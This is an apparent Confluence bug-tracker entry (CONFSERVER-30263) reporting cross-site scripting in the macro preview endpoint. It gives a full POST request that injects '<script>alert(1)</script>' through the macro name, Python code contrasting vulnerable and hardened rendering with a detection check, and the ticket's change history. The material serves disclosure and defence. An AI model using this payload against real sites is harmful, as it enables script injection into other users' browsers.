Example:

      • insert lorem ipsum macro
      • edit macro in lightbox and press preview
      • alter the post request as follows:

      POST /confluence/rest/tinymce/1/macro/preview HTTP/1.1
      Host: test.foo.com
      Connection: keep-alive
      Content-Length: 136
      Accept: text/html, */*; q=0.01
      Origin: https://test.foo.com
      X-Requested-With: XMLHttpRequest
      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.43 Safari/537.31
      Content-Type: application/json; charset=UTF-8
      Referer: https://test.foo.com/confluence/pages/editpage.action?pageId=123456
      Accept-Encoding: gzip,deflate,sdch
      Accept-Language: de-DE,de;q=0.8,en-US;q=0.6,en;q=0.4
      Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
      Cookie: [...]

      {"contentId":"12345","macro":{"name":"lorem-ipsum<script>alert(1)</script>","body":""}}

      • an alert box pops up

      This kind of attack works for all macros available.
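The report above shows the macro name being reflected into the preview unescaped. As an added illustration (a constructed model, not Confluence's own code), the following puts the vulnerable rendering beside a hardened version that validates the name against a registered-macro allowlist and HTML-escapes it, plus a small check that flags a preview request whose macro name carries markup. The allowlist, the name pattern and the HTML layout are assumptions.

```python
import html
import json
import re

# Constructed allowlist standing in for the macros registered in an instance (assumption).
REGISTERED_MACROS = {"lorem-ipsum", "code", "toc"}

# Macro names in this constructed model are limited to lowercase letters, digits and hyphens.
MACRO_NAME_RE = re.compile(r"^[a-z0-9-]{1,64}$")


def render_preview_vulnerable(request_body: str) -> str:
    """Build the preview HTML the way the report describes: the macro name is
    echoed into the page without validation or escaping."""
    macro = json.loads(request_body)["macro"]
    return f'<div class="macro-preview" data-macro-name="{macro["name"]}">Unknown macro: {macro["name"]}</div>'


def render_preview_hardened(request_body: str) -> str:
    """Same preview, but the name must be a registered macro (allowlist) and is
    HTML-escaped before it reaches the page, so a name can never inject markup."""
    macro = json.loads(request_body)["macro"]
    name = macro.get("name", "")
    if not MACRO_NAME_RE.match(name) or name not in REGISTERED_MACROS:
        # Reject instead of echoing; the error text contains nothing user-controlled.
        raise ValueError("unknown macro name")
    safe = html.escape(name, quote=True)
    return f'<div class="macro-preview" data-macro-name="{safe}">Preview of macro: {safe}</div>'


def contains_markup(request_body: str) -> bool:
    """Detection helper: flag a macro-preview request whose macro name carries
    HTML markup characters, which no legitimate editor request produces."""
    name = json.loads(request_body)["macro"].get("name", "")
    return bool(re.search(r"[<>\"']", name))


# Constructed request bodies: a benign one and the payload shape from the report.
BENIGN = '{"contentId":"12345","macro":{"name":"lorem-ipsum","body":""}}'
TAINTED = '{"contentId":"12345","macro":{"name":"lorem-ipsum<script>alert(1)</script>","body":""}}'

if __name__ == "__main__":
    print(render_preview_vulnerable(TAINTED))  # the script tag lands in the page verbatim
    try:
        render_preview_hardened(TAINTED)
    except ValueError as exc:
        print("rejected:", exc)
    print(render_preview_hardened(BENIGN))
    print("tainted request flagged:", contains_markup(TAINTED))
```

In a real deployment the allowlist is the set of macros the macro manager knows, and the detection check belongs in the WAF or request-log pipeline in front of the preview endpoint.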

            [CONFSERVER-30263] XSS attack in macro rendering preview

            Change history:

            Katherine Yabut: workflow changed from JAC Bug Workflow v3 [2875337] to CONFSERVER Bug Workflow v4 [3003740]
            Owen: workflow changed from JAC Bug Workflow v2 [2803304] to JAC Bug Workflow v3 [2875337]; status changed from Resolved [5] to Closed [6]
            Owen: workflow changed from JAC Bug Workflow [2735992] to JAC Bug Workflow v2 [2803304]
            Owen: workflow changed from Confluence Workflow - Public Facing - Restricted v5 - TEMP [2400890] to JAC Bug Workflow [2735992]
            Alex Yakovlev (Inactive): label "bugfix" removed (labels now: affects-server cvss-high editor loyalty security xss)
            Alex Yakovlev (Inactive): label "loyalty" added (labels now: affects-server bugfix cvss-high editor loyalty security xss)
            Katherine Yabut: workflow changed from Confluence Workflow - Public Facing - Restricted v5 [2300702] to Confluence Workflow - Public Facing - Restricted v5 - TEMP [2400890]
            Katherine Yabut: workflow changed from Confluence Workflow - Public Facing - Restricted v5.1 - TEMP [2234701] to Confluence Workflow - Public Facing - Restricted v5 [2300702]
            Katherine Yabut: workflow changed from Confluence Workflow - Public Facing - Restricted v5 - TEMP [2197419] to Confluence Workflow - Public Facing - Restricted v5.1 - TEMP [2234701]
            Katherine Yabut: workflow changed from Confluence Workflow - Public Facing - Restricted v5 [1922840] to Confluence Workflow - Public Facing - Restricted v5 - TEMP [2197419]

              People: Alice Wang (Inactive), Bernd Schaper
              Affected customers: 0
              Watchers: 5
